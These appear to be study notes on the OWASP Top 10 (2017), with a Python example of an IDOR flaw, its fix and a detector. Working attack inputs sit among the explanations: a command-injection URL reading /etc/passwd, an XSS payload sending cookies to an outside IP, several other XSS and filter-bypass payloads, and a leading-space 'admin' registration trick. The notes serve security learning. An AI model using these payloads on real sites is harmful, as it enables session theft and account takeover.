OWASP TOP 10 (2017)
https://cheatsheetseries.owasp.org/IndexTopTen.html
Injection
Command Injection
Blind Injection: the injected command runs, but its output is not returned in the response
Active Injection: the injected command's output is returned to the user in the response
Example: evilshell.php?commandString=cat /etc/passwd
Wildcard Injection
For example, when a privileged program expands a wildcard (*) over a directory, the filenames it matches become arguments to that program; an attacker who can create files in that directory can choose names that complete a valid option or command for the program on one of the wildcard iterations. More info on the page specific to wildcard injection.
Broken Authentication
Brute Force Attacks
Weak Credentials
Weak Session Cookies
Sometimes you may even be able to re-register an existing account and obtain its privileges by registering a username such as " admin" (with a space at the beginning).
Sensitive Data Exposure
Sensitive data such as usernames or passwords left in HTML comments, or flat-file databases that can be downloaded whole.
XML External Entity
Insecure handling of XML payloads (external entities resolved by the parser) can lead to Local File Inclusion (LFI). Example on the XXE page.
Broken Access Control
IDOR (Insecure Direct Object Reference) is a common way to test for broken access control. In essence, changing an object identifier in a client-side parameter returns another user's data, because the web app looks the object up by that identifier alone and never checks that the requesting user is allowed to see it.
note.php?note=1 shows your note
note.php?note=0 shows somebody else's note
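The note lookup described above, as an added example that is not part of the original notes: the flawed lookup that trusts the client-supplied id, the fixed lookup that ties the id to the session user, and a simple detection hook over the denied lookups. Names, sample notes and the threshold are all constructed for the example.

```python
from collections import Counter
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class Note:
    note_id: int
    owner: str
    body: str

# Constructed sample data standing in for the web app's database.
NOTES = {
    0: Note(0, "alice", "alice's private note"),
    1: Note(1, "bob", "bob's shopping list"),
}

# Server-side record of denied lookups, consumed by the detection check below.
DENIED: list = []

def read_note_vulnerable(note_id: int) -> Optional[str]:
    """Mirrors note.php?note=<id>: the id from the client is trusted on its own,
    so any user can walk the id space and read everyone's notes."""
    note = NOTES.get(note_id)
    return note.body if note else None

def read_note(note_id: int, session_user: str) -> Optional[str]:
    """Fixed lookup: the id still comes from the client, but the note is only
    returned when its owner matches the user identified by the server-side
    session. "Not found" and "not yours" get the same answer, so a caller
    cannot learn which ids exist."""
    note = NOTES.get(note_id)
    if note is None or note.owner != session_user:
        DENIED.append((session_user, note_id))
        return None
    return note.body

def id_walkers(threshold: int = 3) -> set:
    """Detection: users with at least `threshold` denied lookups are likely
    iterating ids, which is exactly the IDOR test described in the notes."""
    counts = Counter(user for user, _ in DENIED)
    return {user for user, n in counts.items() if n >= threshold}
```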
Security Misconfiguration
Poorly configured permissions on cloud services, like S3 buckets
Having unnecessary features enabled, like services, pages, accounts or privileges
Default accounts with unchanged passwords (most common)
Error messages that are overly detailed and allow an attacker to find out more about the system
Not using HTTP security headers, or revealing too much detail in the Server: HTTP header
Cross-site Scripting (XSS)
Stored XSS - the most dangerous type of XSS. This is where the malicious string originates from the website's database. This often happens when a website stores user input that has not been sanitised (the "bad parts" of the user's input removed) before being inserted into the database, and later renders it to other users.
<img src=x onerror="this.src='http://10.6.104.9/collect.gif?'+document.cookie; this.removeAttribute('onerror');">
<img src=x onerror=alert('XSS');>
Reflected XSS - the malicious payload is part of the victim's request to the website, and the website includes this payload in its response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.
reflected?keyword=<script>alert("Hello")</script>
reflected?keyword=<script>alert(window.location.hostname)</script>
DOM-Based XSS - DOM stands for Document Object Model and is a programming interface for HTML and XML documents. It represents the page so that programs can change the document structure, style and content. A web page is a document, and this document can be displayed either in the browser window or as the HTML source. In DOM-based XSS the payload never has to pass through the server: the page's own client-side JavaScript reads attacker-controlled data (for example from the URL fragment) and writes it into the DOM.
<script>document.getElementById("thm-title").textContent="I am able to change the title";</script>
http://10.10.33.108/dom#img-url=test" onmouseover="alert(document.cookie)"
Bypass XSS Filters
<embed src=" A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
https://github.com/ihebski/XSS-Payloads
Insecure Deserialization
Deserialising user-provided data without validating it properly (in most cases). For example, tampering with a serialised cookie to gain admin access, or to obtain reverse shell access.
Components with Known Vulnerabilities
Well-known vulnerable applications for which ready-made exploits are published on sites such as exploit-db.com
Insufficient Logging & Monitoring